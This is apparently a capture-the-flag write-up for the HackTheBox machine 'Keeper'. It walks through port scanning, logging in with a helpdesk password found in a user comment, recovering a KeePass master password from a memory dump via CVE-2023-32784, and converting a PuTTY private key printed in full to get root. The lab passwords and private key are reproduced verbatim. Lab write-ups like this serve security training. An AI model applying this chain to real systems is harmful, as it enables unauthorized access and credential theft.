CTF keeper

CTFHackTheBox

10.10.11.227

nmap

1
nmap -sVC -p- 10.10.11.227 -T5 -vvvv

Output:

1
2
3
4
5
6
7
8
9
10
11
12
13
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBKHZRUyrg9VQfKeHHT6CZwCwu9YkJosNSLvDmPM9EC0iMgHj7URNWV3LjJ00gWvduIq7MfXOxzbfPAqvm2ahzTc=
|   256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIBe5w35/5klFq1zo5vISwwbYSVy1Zzy+K9ZCt0px+goO
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-methods: 
|_  Supported Methods: GET HEAD
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Web

On the main page

Add tickets.keeper.htb and keeper.htb to /etc/hosts.

1
2
➜  ~ tail -1 /etc/hosts 
10.10.11.227    tickets.keeper.htb keeper.htb

RT login page


Google it to find the default password.

SSRF

When I want to create a ticket.

But it’s just because he redirect to keeper.htb and not tickets.keeper.htb.

Page for mobile

http://tickets.keeper.htb/rt/m

1
dirsearch -u http://tickets.keeper.htb/rt --exclude-status=302


Useless.

Users

1
2
lnorgaard 	Lise Nørgaard
root 	Enoch Root


We have a bunch of information on this page:

Nickname: Lise
Language: Danish
Unix Login: lnorgaard
Extra info: Helpdesk Agent from Korsbæk
Comment: New user. Initial password set to Welcome2023!

SSH

Login: lnorgaard
Password: Welcome2023!

1
ssh [email protected]

RT30000.zip

I have the file RT30000.zip in my home.
I have to download it so I open a web server from the target.

Unzip it then see what is inside:

1
2
3
4
5
6
7
8
9
10
➜  keeper unzip RT30000.zip 
Archive:  RT30000.zip
  inflating: KeePassDumpFull.dmp     
 extracting: passcodes.kdbx     

➜  keeper file *
KeePassDumpFull.dmp: Mini DuMP crash report, 16 streams, Fri May 19 13:46:21 2023, 0x1806 type
passcodes.kdbx:      Keepass password database 2.x KDBX
RT30000.zip:         Zip archive data, at least v2.0 to extract, compression method=deflate

KeePass 2.X dumper (CVE-2023-32784)

1
2
git clone https://github.com/z-jxy/keepass_dump
python3 keepass_dump/keepass_dump.py -f KeePassDumpFull.dmp

The password is not complete.

1
Extracted: {UNKNOWN}dgrd med flde

Google it

Rødgrød med Fløde
So the password should be : 

1
2
3
4
5
6
Rødgrød med Fløde
Rodgrod med Flode
RodgrodmedFlode
rdgrd med flde
odgrd med flde
rødgrød med fløde

Open it with KeePassXC

Password: Rodgrod med Flode

Root Password: F4><3K0nd!
Notes:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0

I have to use this id_rsa file but it’s made for putty.

Convert id_rsa and ssh into root

https://superuser.com/questions/232362/how-to-convert-ppk-key-to-openssh-key-under-linux

Download putty:

1
sudo apt-get install putty-tools

Generate the keys:

1
2
puttygen id-rsa-putty -O private-openssh -o id_dsa 
puttygen id-rsa-putty -O public-openssh -o id_dsa.pub

Only the private key is needed, the password is useless.

I’m root